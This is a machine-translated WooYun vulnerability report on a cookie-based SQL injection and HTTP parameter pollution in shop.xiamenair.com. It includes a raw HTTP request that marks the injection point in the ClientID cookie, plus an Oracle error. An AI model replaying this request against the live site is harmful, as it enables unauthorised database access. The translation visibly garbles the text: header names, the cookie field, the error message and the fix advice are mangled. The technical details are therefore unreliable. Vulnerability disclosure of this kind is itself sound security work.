漏洞标题 厦航一个分站cookie注入+ HTTP参数污染 相关制造商 Xiamenair.com 漏洞作者 小爷,我不能杀了你。 提交时间 2016-04-25 12: 08 公共时间 2016-06-10 14: 40 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 15 漏洞状态 制造商已确认 标签标签 漏洞详细信息 注入cookie字段中的ClientID参数: 数据库是oracle Hpp攻击 存在的链接:http://shop.xiamenair.com/prolist.aspx?k=1&n941808=v923726 参数k 漏洞证明: 数据包: GET /cart.aspx HTTP/1.1 Cookie: ASP.NET_SessionId=yusvid455opdjh45h1h30yjd;客户端ID=1 *;键=ClientID的 Referer:http://shop.xiamenair.com/ 主机: shop.xiamenair.com 连接:保持活动状态 Accept-Encoding: gzip,deflate 用户代理: Mozilla/5.0(兼容; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) 接受: */*
同一站后注入有报道:WooYun:厦门航空公司一个分站sql注入漏洞 数据库将无法运行 ORA-01740:徽标中缺少双引号 登录框的错误消息:
修理计划: 你更专业 版权声明:请注明出处,请不要杀了你@乌云